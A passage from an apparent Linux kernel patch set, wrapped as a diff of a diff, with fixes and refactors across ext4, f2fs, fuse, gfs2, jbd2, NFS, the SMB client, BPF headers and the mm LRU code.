+@@ -3096,6 +3096,8 @@ extern const char *ext4_decode_error(struct super_block *sb, int errno,
+ extern void ext4_mark_group_bitmap_corrupted(struct super_block *sb,
+ 					     ext4_group_t block_group,
+ 					     unsigned int flags);
++extern unsigned int ext4_num_base_meta_blocks(struct super_block *sb,
++					      ext4_group_t block_group);
+ 
+ extern __printf(7, 8)
+ void __ext4_error(struct super_block *, const char *, unsigned int, bool,
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index c2b7d09238941..37dca728ff967 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -2160,15 +2160,6 @@ static inline int f2fs_down_read_trylock(struct f2fs_rwsem *sem)
+ 	return down_read_trylock(&sem->internal_rwsem);
+ }
+ 
+-#ifdef CONFIG_DEBUG_LOCK_ALLOC
+-static inline void f2fs_down_read_nested(struct f2fs_rwsem *sem, int subclass)
+-{
+-	down_read_nested(&sem->internal_rwsem, subclass);
+-}
+-#else
+-#define f2fs_down_read_nested(sem, subclass) f2fs_down_read(sem)
+-#endif
+-
+ static inline void f2fs_up_read(struct f2fs_rwsem *sem)
+ {
+ 	up_read(&sem->internal_rwsem);
+@@ -2179,6 +2170,21 @@ static inline void f2fs_down_write(struct f2fs_rwsem *sem)
+ 	down_write(&sem->internal_rwsem);
+ }
+ 
++#ifdef CONFIG_DEBUG_LOCK_ALLOC
++static inline void f2fs_down_read_nested(struct f2fs_rwsem *sem, int subclass)
++{
++	down_read_nested(&sem->internal_rwsem, subclass);
++}
++
++static inline void f2fs_down_write_nested(struct f2fs_rwsem *sem, int subclass)
++{
++	down_write_nested(&sem->internal_rwsem, subclass);
++}
++#else
++#define f2fs_down_read_nested(sem, subclass) f2fs_down_read(sem)
++#define f2fs_down_write_nested(sem, subclass) f2fs_down_write(sem)
++#endif
++
+ static inline int f2fs_down_write_trylock(struct f2fs_rwsem *sem)
+ {
+ 	return down_write_trylock(&sem->internal_rwsem);
+diff --git a/fs/f2fs/inline.c b/fs/f2fs/inline.c
+index 7e867dff681dc..8747eec3d0a34 100644
+--- a/fs/f2fs/inline.c
++++ b/fs/f2fs/inline.c
+@@ -642,7 +642,8 @@ int f2fs_add_inline_entry(struct inode *dir, const struct f2fs_filename *fname,
+ 	}
+ 
+ 	if (inode) {
+-		f2fs_down_write(&F2FS_I(inode)->i_sem);
++		f2fs_down_write_nested(&F2FS_I(inode)->i_sem,
++						SINGLE_DEPTH_NESTING);
+ 		page = f2fs_init_inode_metadata(inode, dir, fname, ipage);
+ 		if (IS_ERR(page)) {
+ 			err = PTR_ERR(page);
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index cbbf95b995414..16bf9d5c8d4f9 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -204,6 +204,8 @@ void f2fs_abort_atomic_write(struct inode *inode, bool clean)
+ 		f2fs_i_size_write(inode, fi->original_i_size);
+ 		fi->original_i_size = 0;
+ 	}
++	/* avoid stale dirty inode during eviction */
++	sync_inode_metadata(inode, 0);
+ }
+ 
+ static int __replace_atomic_write_block(struct inode *inode, pgoff_t index,
+diff --git a/fs/fuse/readdir.c b/fs/fuse/readdir.c
+index e8deaacf1832a..f40bc51fa5316 100644
+--- a/fs/fuse/readdir.c
++++ b/fs/fuse/readdir.c
+@@ -243,8 +243,16 @@ retry:
+ 			dput(dentry);
+ 			dentry = alias;
+ 		}
+-		if (IS_ERR(dentry))
++		if (IS_ERR(dentry)) {
++			if (!IS_ERR(inode)) {
++				struct fuse_inode *fi = get_fuse_inode(inode);
++
++				spin_lock(&fi->lock);
++				fi->nlookup--;
++				spin_unlock(&fi->lock);
++			}
+ 			return PTR_ERR(dentry);
++		}
+ 	}
+ 	if (fc->readdirplus_auto)
+ 		set_bit(FUSE_I_INIT_RDPLUS, &get_fuse_inode(inode)->state);
+diff --git a/fs/gfs2/aops.c b/fs/gfs2/aops.c
+index 2f04c0ff7470b..1e9fa26f04fe1 100644
+--- a/fs/gfs2/aops.c
++++ b/fs/gfs2/aops.c
+@@ -182,13 +182,13 @@ static int gfs2_writepages(struct address_space *mapping,
+ 	int ret;
+ 
+ 	/*
+-	 * Even if we didn't write any pages here, we might still be holding
++	 * Even if we didn't write enough pages here, we might still be holding
+ 	 * dirty pages in the ail. We forcibly flush the ail because we don't
+ 	 * want balance_dirty_pages() to loop indefinitely trying to write out
+ 	 * pages held in the ail that it can't find.
+ 	 */
+ 	ret = iomap_writepages(mapping, wbc, &wpc, &gfs2_writeback_ops);
+-	if (ret == 0)
++	if (ret == 0 && wbc->nr_to_write > 0)
+ 		set_bit(SDF_FORCE_AIL_FLUSH, &sdp->sd_flags);
+ 	return ret;
+ }
+diff --git a/fs/gfs2/log.c b/fs/gfs2/log.c
+index 61323deb80bc7..e021d5f50c231 100644
+--- a/fs/gfs2/log.c
++++ b/fs/gfs2/log.c
+@@ -1285,9 +1285,6 @@ static inline int gfs2_ail_flush_reqd(struct gfs2_sbd *sdp)
+ {
+ 	unsigned int used_blocks = sdp->sd_jdesc->jd_blocks - atomic_read(&sdp->sd_log_blks_free);
+ 
+-	if (test_and_clear_bit(SDF_FORCE_AIL_FLUSH, &sdp->sd_flags))
+-		return 1;
+-
+ 	return used_blocks + atomic_read(&sdp->sd_log_blks_needed) >=
+ 		atomic_read(&sdp->sd_log_thresh2);
+ }
+@@ -1304,7 +1301,6 @@ int gfs2_logd(void *data)
+ {
+ 	struct gfs2_sbd *sdp = data;
+ 	unsigned long t = 1;
+-	DEFINE_WAIT(wait);
+ 
+ 	while (!kthread_should_stop()) {
+ 
+@@ -1329,7 +1325,9 @@ int gfs2_logd(void *data)
+ 						  GFS2_LFC_LOGD_JFLUSH_REQD);
+ 		}
+ 
+-		if (gfs2_ail_flush_reqd(sdp)) {
++		if (test_bit(SDF_FORCE_AIL_FLUSH, &sdp->sd_flags) ||
++		    gfs2_ail_flush_reqd(sdp)) {
++			clear_bit(SDF_FORCE_AIL_FLUSH, &sdp->sd_flags);
+ 			gfs2_ail1_start(sdp);
+ 			gfs2_ail1_wait(sdp);
+ 			gfs2_ail1_empty(sdp, 0);
+@@ -1341,17 +1339,12 @@ int gfs2_logd(void *data)
+ 
+ 		try_to_freeze();
+ 
+-		do {
+-			prepare_to_wait(&sdp->sd_logd_waitq, &wait,
+-					TASK_INTERRUPTIBLE);
+-			if (!gfs2_ail_flush_reqd(sdp) &&
+-			    !gfs2_jrnl_flush_reqd(sdp) &&
+-			    !kthread_should_stop())
+-				t = schedule_timeout(t);
+-		} while(t && !gfs2_ail_flush_reqd(sdp) &&
+-			!gfs2_jrnl_flush_reqd(sdp) &&
+-			!kthread_should_stop());
+-		finish_wait(&sdp->sd_logd_waitq, &wait);
++		t = wait_event_interruptible_timeout(sdp->sd_logd_waitq,
++				test_bit(SDF_FORCE_AIL_FLUSH, &sdp->sd_flags) ||
++				gfs2_ail_flush_reqd(sdp) ||
++				gfs2_jrnl_flush_reqd(sdp) ||
++				kthread_should_stop(),
++				t);
+ 	}
+ 
+ 	return 0;
+diff --git a/fs/jbd2/checkpoint.c b/fs/jbd2/checkpoint.c
+index 9ec91017a7f3c..f033ac807013c 100644
+--- a/fs/jbd2/checkpoint.c
++++ b/fs/jbd2/checkpoint.c
+@@ -349,6 +349,8 @@ int jbd2_cleanup_journal_tail(journal_t *journal)
+ 
+ /* Checkpoint list management */
+ 
++enum shrink_type {SHRINK_DESTROY, SHRINK_BUSY_STOP, SHRINK_BUSY_SKIP};
++
+ /*
+  * journal_shrink_one_cp_list
+  *
+@@ -360,7 +362,8 @@ int jbd2_cleanup_journal_tail(journal_t *journal)
+  * Called with j_list_lock held.
+  */
+ static unsigned long journal_shrink_one_cp_list(struct journal_head *jh,
+-						bool destroy, bool *released)
++						enum shrink_type type,
++						bool *released)
+ {
+ 	struct journal_head *last_jh;
+ 	struct journal_head *next_jh = jh;
+@@ -376,12 +379,15 @@ static unsigned long journal_shrink_one_cp_list(struct journal_head *jh,
+ 		jh = next_jh;
+ 		next_jh = jh->b_cpnext;
+ 
+-		if (destroy) {
++		if (type == SHRINK_DESTROY) {
+ 			ret = __jbd2_journal_remove_checkpoint(jh);
+ 		} else {
+ 			ret = jbd2_journal_try_remove_checkpoint(jh);
+-			if (ret < 0)
+-				continue;
++			if (ret < 0) {
++				if (type == SHRINK_BUSY_SKIP)
++					continue;
++				break;
++			}
+ 		}
+ 
+ 		nr_freed++;
+@@ -445,7 +451,7 @@ again:
+ 		tid = transaction->t_tid;
+ 
+ 		freed = journal_shrink_one_cp_list(transaction->t_checkpoint_list,
+-						   false, &released);
++						   SHRINK_BUSY_SKIP, &released);
+ 		nr_freed += freed;
+ 		(*nr_to_scan) -= min(*nr_to_scan, freed);
+ 		if (*nr_to_scan == 0)
+@@ -485,19 +491,21 @@ out:
+ void __jbd2_journal_clean_checkpoint_list(journal_t *journal, bool destroy)
+ {
+ 	transaction_t *transaction, *last_transaction, *next_transaction;
++	enum shrink_type type;
+ 	bool released;
+ 
+ 	transaction = journal->j_checkpoint_transactions;
+ 	if (!transaction)
+ 		return;
+ 
++	type = destroy ? SHRINK_DESTROY : SHRINK_BUSY_STOP;
+ 	last_transaction = transaction->t_cpprev;
+ 	next_transaction = transaction;
+ 	do {
+ 		transaction = next_transaction;
+ 		next_transaction = transaction->t_cpnext;
+ 		journal_shrink_one_cp_list(transaction->t_checkpoint_list,
+-					   destroy, &released);
++					   type, &released);
+ 		/*
+ 		 * This function only frees up some memory if possible so we
+ 		 * dont have an obligation to finish processing. Bail out if
+@@ -631,6 +639,8 @@ int jbd2_journal_try_remove_checkpoint(struct journal_head *jh)
+ {
+ 	struct buffer_head *bh = jh2bh(jh);
+ 
++	if (jh->b_transaction)
++		return -EBUSY;
+ 	if (!trylock_buffer(bh))
+ 		return -EBUSY;
+ 	if (buffer_dirty(bh)) {
+diff --git a/fs/jbd2/recovery.c b/fs/jbd2/recovery.c
+index 8286a9ec122fe..357a3f7632e39 100644
+--- a/fs/jbd2/recovery.c
++++ b/fs/jbd2/recovery.c
+@@ -229,12 +229,8 @@ static int count_tags(journal_t *journal, struct buffer_head *bh)
+ /* Make sure we wrap around the log correctly! */
+ #define wrap(journal, var)						\
+ do {									\
+-	unsigned long _wrap_last =					\
+-		jbd2_has_feature_fast_commit(journal) ?			\
+-			(journal)->j_fc_last : (journal)->j_last;	\
+-									\
+-	if (var >= _wrap_last)						\
+-		var -= (_wrap_last - (journal)->j_first);		\
++	if (var >= (journal)->j_last)					\
++		var -= ((journal)->j_last - (journal)->j_first);	\
+ } while (0)
+ 
+ static int fc_do_one_pass(journal_t *journal,
+@@ -517,9 +513,7 @@ static int do_one_pass(journal_t *journal,
+ 				break;
+ 
+ 		jbd2_debug(2, "Scanning for sequence ID %u at %lu/%lu\n",
+-			  next_commit_ID, next_log_block,
+-			  jbd2_has_feature_fast_commit(journal) ?
+-			  journal->j_fc_last : journal->j_last);
++			  next_commit_ID, next_log_block, journal->j_last);
+ 
+ 		/* Skip over each chunk of the transaction looking
+ 		 * either the next descriptor block or the final commit
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index cf34d0c309459..3bb530d4bb5ce 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -474,13 +474,31 @@ out:
+ 	return result;
+ }
+ 
++static void nfs_direct_add_page_head(struct list_head *list,
++				     struct nfs_page *req)
++{
++	struct nfs_page *head = req->wb_head;
++
++	if (!list_empty(&head->wb_list) || !nfs_lock_request(head))
++		return;
++	if (!list_empty(&head->wb_list)) {
++		nfs_unlock_request(head);
++		return;
++	}
++	list_add(&head->wb_list, list);
++	kref_get(&head->wb_kref);
++	kref_get(&head->wb_kref);
++}
++
+ static void nfs_direct_join_group(struct list_head *list, struct inode *inode)
+ {
+ 	struct nfs_page *req, *subreq;
+ 
+ 	list_for_each_entry(req, list, wb_list) {
+-		if (req->wb_head != req)
++		if (req->wb_head != req) {
++			nfs_direct_add_page_head(&req->wb_list, req);
+ 			continue;
++		}
+ 		subreq = req->wb_this_page;
+ 		if (subreq == req)
+ 			continue;
+diff --git a/fs/nfs/pnfs_dev.c b/fs/nfs/pnfs_dev.c
+index ddbbf4fcda867..178001c90156f 100644
+--- a/fs/nfs/pnfs_dev.c
++++ b/fs/nfs/pnfs_dev.c
+@@ -154,7 +154,7 @@ nfs4_get_device_info(struct nfs_server *server,
+ 		set_bit(NFS_DEVICEID_NOCACHE, &d->flags);
+ 
+ out_free_pages:
+-	for (i = 0; i < max_pages; i++)
++	while (--i >= 0)
+ 		__free_page(pages[i]);
+ 	kfree(pages);
+ out_free_pdev:
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+index bfc964b36c72e..5a132c1e6f6c4 100644
+--- a/fs/smb/client/cached_dir.c
++++ b/fs/smb/client/cached_dir.c
+@@ -218,7 +218,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		.tcon = tcon,
+ 		.path = path,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
+-		.desired_access = FILE_READ_ATTRIBUTES,
++		.desired_access =  FILE_READ_DATA | FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+ 		.fid = pfid,
+ 	};
+diff --git a/fs/smb/client/cifs_dfs_ref.c b/fs/smb/client/cifs_dfs_ref.c
+index b0864da9ef434..020e71fe1454e 100644
+--- a/fs/smb/client/cifs_dfs_ref.c
++++ b/fs/smb/client/cifs_dfs_ref.c
+@@ -258,61 +258,23 @@ compose_mount_options_err:
+ 	goto compose_mount_options_out;
+ }
+ 
+-/**
+- * cifs_dfs_do_mount - mounts specified path using DFS full path
+- *
+- * Always pass down @fullpath to smb3_do_mount() so we can use the root server
+- * to perform failover in case we failed to connect to the first target in the
+- * referral.
+- *
+- * @mntpt:		directory entry for the path we are trying to automount
+- * @cifs_sb:		parent/root superblock
+- * @fullpath:		full path in UNC format
+- */
+-static struct vfsmount *cifs_dfs_do_mount(struct dentry *mntpt,
+-					  struct cifs_sb_info *cifs_sb,
+-					  const char *fullpath)
+-{
+-	struct vfsmount *mnt;
+-	char *mountdata;
+-	char *devname;
+-
+-	devname = kstrdup(fullpath, GFP_KERNEL);
+-	if (!devname)
+-		return ERR_PTR(-ENOMEM);
+-
+-	convert_delimiter(devname, '/');
+-
+-	/* TODO: change to call fs_context_for_mount(), fill in context directly, call fc_mount */
+-
+-	/* See afs_mntpt_do_automount in fs/afs/mntpt.c for an example */
+-
+-	/* strip first '\' from fullpath */
+-	mountdata = cifs_compose_mount_options(cifs_sb->ctx->mount_options,
+-					       fullpath + 1, NULL, NULL);
+-	if (IS_ERR(mountdata)) {
+-		kfree(devname);
+-		return (struct vfsmount *)mountdata;
+-	}
+-
+-	mnt = vfs_submount(mntpt, &cifs_fs_type, devname, mountdata);
+-	kfree(mountdata);
+-	kfree(devname);
+-	return mnt;
+-}
+-
+ /*
+  * Create a vfsmount that we can automount
+  */
+-static struct vfsmount *cifs_dfs_do_automount(struct dentry *mntpt)
++static struct vfsmount *cifs_dfs_do_automount(struct path *path)
+ {
++	int rc;
++	struct dentry *mntpt = path->dentry;
++	struct fs_context *fc;
+ 	struct cifs_sb_info *cifs_sb;
+-	void *page;
++	void *page = NULL;
++	struct smb3_fs_context *ctx, *cur_ctx;
++	struct smb3_fs_context tmp;
+ 	char *full_path;
+ 	struct vfsmount *mnt;
+ 
+-	cifs_dbg(FYI, "in %s\n", __func__);
+-	BUG_ON(IS_ROOT(mntpt));
++	if (IS_ROOT(mntpt))
++		return ERR_PTR(-ESTALE);
+ 
+ 	/*
+ 	 * The MSDFS spec states that paths in DFS referral requests and
+@@ -321,29 +283,47 @@ static struct vfsmount *cifs_dfs_do_automount(struct dentry *mntpt)
+ 	 * gives us the latter, so we must adjust the result.
+ 	 */
+ 	cifs_sb = CIFS_SB(mntpt->d_sb);
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) {
+-		mnt = ERR_PTR(-EREMOTE);
+-		goto cdda_exit;
+-	}
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS)
++		return ERR_PTR(-EREMOTE);
++
++	cur_ctx = cifs_sb->ctx;
++
++	fc = fs_context_for_submount(path->mnt->mnt_sb->s_type, mntpt);
++	if (IS_ERR(fc))
++		return ERR_CAST(fc);
++
++	ctx = smb3_fc2context(fc);
+ 
+ 	page = alloc_dentry_path();
+ 	/* always use tree name prefix */
+ 	full_path = build_path_from_dentry_optional_prefix(mntpt, page, true);
+ 	if (IS_ERR(full_path)) {
+ 		mnt = ERR_CAST(full_path);
+-		goto free_full_path;
++		goto out;
+ 	}
+ 
+-	convert_delimiter(full_path, '\\');
++	convert_delimiter(full_path, '/');
+ 	cifs_dbg(FYI, "%s: full_path: %s\n", __func__, full_path);
+ 
+-	mnt = cifs_dfs_do_mount(mntpt, cifs_sb, full_path);
+-	cifs_dbg(FYI, "%s: cifs_dfs_do_mount:%s , mnt:%p\n", __func__, full_path + 1, mnt);
++	tmp = *cur_ctx;
++	tmp.source = full_path;
++	tmp.UNC = tmp.prepath = NULL;
++
++	rc = smb3_fs_context_dup(ctx, &tmp);
++	if (rc) {
++		mnt = ERR_PTR(rc);
++		goto out;
++	}
++
++	rc = smb3_parse_devname(full_path, ctx);
++	if (!rc)
++		mnt = fc_mount(fc);
++	else
++		mnt = ERR_PTR(rc);
+ 
+-free_full_path:
++out:
++	put_fs_context(fc);
+ 	free_dentry_path(page);
+-cdda_exit:
+-	cifs_dbg(FYI, "leaving %s\n" , __func__);
+ 	return mnt;
+ }
+ 
+@@ -354,9 +334,9 @@ struct vfsmount *cifs_dfs_d_automount(struct path *path)
+ {
+ 	struct vfsmount *newmnt;
+ 
+-	cifs_dbg(FYI, "in %s\n", __func__);
++	cifs_dbg(FYI, "%s: %pd\n", __func__, path->dentry);
+ 
+-	newmnt = cifs_dfs_do_automount(path->dentry);
++	newmnt = cifs_dfs_do_automount(path);
+ 	if (IS_ERR(newmnt)) {
+ 		cifs_dbg(FYI, "leaving %s [automount failed]\n" , __func__);
+ 		return newmnt;
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 4a092cc5a3936..03f34ec63e10d 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -734,6 +734,7 @@ struct TCP_Server_Info {
+ 	 */
+ #define CIFS_SERVER_IS_CHAN(server)	(!!(server)->primary_server)
+ 	struct TCP_Server_Info *primary_server;
++	__u16 channel_sequence_num;  /* incremented on primary channel on each chan reconnect */
+ 
+ #ifdef CONFIG_CIFS_SWN_UPCALL
+ 	bool use_swn_dstaddr;
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 9cd282960c0bb..57da4f23c1e43 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -1725,6 +1725,7 @@ cifs_get_tcp_session(struct smb3_fs_context *ctx,
+ 		ctx->target_rfc1001_name, RFC1001_NAME_LEN_WITH_NULL);
+ 	tcp_ses->session_estab = false;
+ 	tcp_ses->sequence_number = 0;
++	tcp_ses->channel_sequence_num = 0; /* only tracked for primary channel */
+ 	tcp_ses->reconnect_instance = 1;
+ 	tcp_ses->lstrp = jiffies;
+ 	tcp_ses->compress_algorithm = cpu_to_le16(ctx->compression);
+diff --git a/fs/smb/client/fscache.c b/fs/smb/client/fscache.c
+index f6f3a6b75601b..e73625b5d0cc6 100644
+--- a/fs/smb/client/fscache.c
++++ b/fs/smb/client/fscache.c
+@@ -48,7 +48,7 @@ int cifs_fscache_get_super_cookie(struct cifs_tcon *tcon)
+ 	sharename = extract_sharename(tcon->tree_name);
+ 	if (IS_ERR(sharename)) {
+ 		cifs_dbg(FYI, "%s: couldn't extract sharename\n", __func__);
+-		return -EINVAL;
++		return PTR_ERR(sharename);
+ 	}
+ 
+ 	slen = strlen(sharename);
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 6b020d80bb949..1387d5126f53b 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -167,8 +167,17 @@ smb2_set_credits(struct TCP_Server_Info *server, const int val)
+ 
+ 	spin_lock(&server->req_lock);
+ 	server->credits = val;
+-	if (val == 1)
++	if (val == 1) {
+ 		server->reconnect_instance++;
++		/*
++		 * ChannelSequence updated for all channels in primary channel so that consistent
++		 * across SMB3 requests sent on any channel. See MS-SMB2 3.2.4.1 and 3.2.7.1
++		 */
++		if (CIFS_SERVER_IS_CHAN(server))
++			server->primary_server->channel_sequence_num++;
++		else
++			server->channel_sequence_num++;
++	}
+ 	scredits = server->credits;
+ 	in_flight = server->in_flight;
+ 	spin_unlock(&server->req_lock);
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index ae17d78f6ba17..847d69d327c2a 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -88,9 +88,20 @@ smb2_hdr_assemble(struct smb2_hdr *shdr, __le16 smb2_cmd,
+ 		  const struct cifs_tcon *tcon,
+ 		  struct TCP_Server_Info *server)
+ {
++	struct smb3_hdr_req *smb3_hdr;
+ 	shdr->ProtocolId = SMB2_PROTO_NUMBER;
+ 	shdr->StructureSize = cpu_to_le16(64);
+ 	shdr->Command = smb2_cmd;
++	if (server->dialect >= SMB30_PROT_ID) {
++		/* After reconnect SMB3 must set ChannelSequence on subsequent reqs */
++		smb3_hdr = (struct smb3_hdr_req *)shdr;
++		/* if primary channel is not set yet, use default channel for chan sequence num */
++		if (CIFS_SERVER_IS_CHAN(server))
++			smb3_hdr->ChannelSequence =
++				cpu_to_le16(server->primary_server->channel_sequence_num);
++		else
++			smb3_hdr->ChannelSequence = cpu_to_le16(server->channel_sequence_num);
++	}
+ 	if (server) {
+ 		spin_lock(&server->req_lock);
+ 		/* Request up to 10 credits but don't go over the limit. */
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index 7d605db3bb3b9..9619015d78f29 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -153,6 +153,28 @@ struct smb2_hdr {
+ 	__u8   Signature[16];
+ } __packed;
+ 
++struct smb3_hdr_req {
++	__le32 ProtocolId;	/* 0xFE 'S' 'M' 'B' */
++	__le16 StructureSize;	/* 64 */
++	__le16 CreditCharge;	/* MBZ */
++	__le16 ChannelSequence; /* See MS-SMB2 3.2.4.1 and 3.2.7.1 */
++	__le16 Reserved;
++	__le16 Command;
++	__le16 CreditRequest;	/* CreditResponse */
++	__le32 Flags;
++	__le32 NextCommand;
++	__le64 MessageId;
++	union {
++		struct {
++			__le32 ProcessId;
++			__le32  TreeId;
++		} __packed SyncId;
++		__le64  AsyncId;
++	} __packed Id;
++	__le64  SessionId;
++	__u8   Signature[16];
++} __packed;
++
+ struct smb2_pdu {
+ 	struct smb2_hdr hdr;
+ 	__le16 StructureSize2; /* size of wct area (varies, request specific) */
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 8cef9ec3a89c2..b3d3aa8437dce 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -862,22 +862,18 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *tr, void *image, void *i
+ 				const struct btf_func_model *m, u32 flags,
+ 				struct bpf_tramp_links *tlinks,
+ 				void *orig_call);
+-/* these two functions are called from generated trampoline */
+-u64 notrace __bpf_prog_enter(struct bpf_prog *prog, struct bpf_tramp_run_ctx *run_ctx);
+-void notrace __bpf_prog_exit(struct bpf_prog *prog, u64 start, struct bpf_tramp_run_ctx *run_ctx);
+-u64 notrace __bpf_prog_enter_sleepable(struct bpf_prog *prog, struct bpf_tramp_run_ctx *run_ctx);
+-void notrace __bpf_prog_exit_sleepable(struct bpf_prog *prog, u64 start,
+-				       struct bpf_tramp_run_ctx *run_ctx);
+-u64 notrace __bpf_prog_enter_lsm_cgroup(struct bpf_prog *prog,
+-					struct bpf_tramp_run_ctx *run_ctx);
+-void notrace __bpf_prog_exit_lsm_cgroup(struct bpf_prog *prog, u64 start,
+-					struct bpf_tramp_run_ctx *run_ctx);
+-u64 notrace __bpf_prog_enter_struct_ops(struct bpf_prog *prog,
+-					struct bpf_tramp_run_ctx *run_ctx);
+-void notrace __bpf_prog_exit_struct_ops(struct bpf_prog *prog, u64 start,
+-					struct bpf_tramp_run_ctx *run_ctx);
++u64 notrace __bpf_prog_enter_sleepable_recur(struct bpf_prog *prog,
++					     struct bpf_tramp_run_ctx *run_ctx);
++void notrace __bpf_prog_exit_sleepable_recur(struct bpf_prog *prog, u64 start,
++					     struct bpf_tramp_run_ctx *run_ctx);
+ void notrace __bpf_tramp_enter(struct bpf_tramp_image *tr);
+ void notrace __bpf_tramp_exit(struct bpf_tramp_image *tr);
++typedef u64 (*bpf_trampoline_enter_t)(struct bpf_prog *prog,
++				      struct bpf_tramp_run_ctx *run_ctx);
++typedef void (*bpf_trampoline_exit_t)(struct bpf_prog *prog, u64 start,
++				      struct bpf_tramp_run_ctx *run_ctx);
++bpf_trampoline_enter_t bpf_trampoline_enter(const struct bpf_prog *prog);
++bpf_trampoline_exit_t bpf_trampoline_exit(const struct bpf_prog *prog);
+ 
+ struct bpf_ksym {
+ 	unsigned long		 start;
+diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
+index 0eb8f035b3d9f..1a32baa78ce26 100644
+--- a/include/linux/bpf_verifier.h
++++ b/include/linux/bpf_verifier.h
+@@ -648,4 +648,17 @@ static inline enum bpf_prog_type resolve_prog_type(const struct bpf_prog *prog)
+ 		prog->aux->dst_prog->type : prog->type;
+ }
+ 
++static inline bool bpf_prog_check_recur(const struct bpf_prog *prog)
++{
++	switch (resolve_prog_type(prog)) {
++	case BPF_PROG_TYPE_TRACING:
++		return prog->expected_attach_type != BPF_TRACE_ITER;
++	case BPF_PROG_TYPE_STRUCT_OPS:
++	case BPF_PROG_TYPE_LSM:
++		return false;
++	default:
++		return true;
++	}
++}
++
+ #endif /* _LINUX_BPF_VERIFIER_H */
+diff --git a/include/linux/ipv6.h b/include/linux/ipv6.h
+index 37dfdcfcdd542..15d7529ac9534 100644
+--- a/include/linux/ipv6.h
++++ b/include/linux/ipv6.h
+@@ -146,6 +146,7 @@ struct inet6_skb_parm {
+ #define IP6SKB_JUMBOGRAM      128
+ #define IP6SKB_SEG6	      256
+ #define IP6SKB_FAKEJUMBO      512
++#define IP6SKB_MULTIPATH      1024
+ };
+ 
+ #if defined(CONFIG_NET_L3_MASTER_DEV)
+diff --git a/include/linux/micrel_phy.h b/include/linux/micrel_phy.h
+index 1f7c33b2f5a3f..e164facb0f363 100644
+--- a/include/linux/micrel_phy.h
++++ b/include/linux/micrel_phy.h
+@@ -38,9 +38,9 @@
+ #define	PHY_ID_KSZ9477		0x00221631
+ 
+ /* struct phy_device dev_flags definitions */
+-#define MICREL_PHY_50MHZ_CLK	0x00000001
+-#define MICREL_PHY_FXEN		0x00000002
+-#define MICREL_KSZ8_P1_ERRATA	0x00000003
++#define MICREL_PHY_50MHZ_CLK	BIT(0)
++#define MICREL_PHY_FXEN		BIT(1)
++#define MICREL_KSZ8_P1_ERRATA	BIT(2)
+ 
+ #define MICREL_KSZ9021_EXTREG_CTRL	0xB
+ #define MICREL_KSZ9021_EXTREG_DATA_WRITE	0xC
+diff --git a/include/linux/mm_inline.h b/include/linux/mm_inline.h
+index e8ed225d8f7ca..4ef6c09cc2eec 100644
+--- a/include/linux/mm_inline.h
++++ b/include/linux/mm_inline.h
+@@ -256,9 +256,9 @@ static inline bool lru_gen_add_folio(struct lruvec *lruvec, struct folio *folio,
+ 	lru_gen_update_size(lruvec, folio, -1, gen);
+ 	/* for folio_rotate_reclaimable() */
+ 	if (reclaiming)
+-		list_add_tail(&folio->lru, &lrugen->lists[gen][type][zone]);
++		list_add_tail(&folio->lru, &lrugen->folios[gen][type][zone]);
+ 	else
+-		list_add(&folio->lru, &lrugen->lists[gen][type][zone]);
++		list_add(&folio->lru, &lrugen->folios[gen][type][zone]);
+ 
+ 	return true;
+ }
+diff --git a/include/linux/mmzone.h b/include/linux/mmzone.h
+index 5f74891556f33..323ee36df683e 100644
+--- a/include/linux/mmzone.h
++++ b/include/linux/mmzone.h
+@@ -312,7 +312,7 @@ enum lruvec_flags {
+  * They form a sliding window of a variable size [MIN_NR_GENS, MAX_NR_GENS]. An
+  * offset within MAX_NR_GENS, i.e., gen, indexes the LRU list of the
+  * corresponding generation. The gen counter in folio->flags stores gen+1 while
+- * a page is on one of lrugen->lists[]. Otherwise it stores 0.
++ * a page is on one of lrugen->folios[]. Otherwise it stores 0.
+  *
+  * A page is added to the youngest generation on faulting. The aging needs to
+  * check the accessed bit at least twice before handing this page over to the
+@@ -324,8 +324,8 @@ enum lruvec_flags {
+  * rest of generations, if they exist, are considered inactive. See
+  * lru_gen_is_active().
+  *
+- * PG_active is always cleared while a page is on one of lrugen->lists[] so that
+- * the aging needs not to worry about it. And it's set again when a page
++ * PG_active is always cleared while a page is on one of lrugen->folios[] so
++ * that the aging needs not to worry about it. And it's set again when a page
+  * considered active is isolated for non-reclaiming purposes, e.g., migration.
+  * See lru_gen_add_folio() and lru_gen_del_folio().
+  *
+@@ -412,7 +412,7 @@ struct lru_gen_struct {
+ 	/* the birth time of each generation in jiffies */
+ 	unsigned long timestamps[MAX_NR_GENS];
+ 	/* the multi-gen LRU lists, lazily sorted on eviction */
+-	struct list_head lists[MAX_NR_GENS][ANON_AND_FILE][MAX_NR_ZONES];
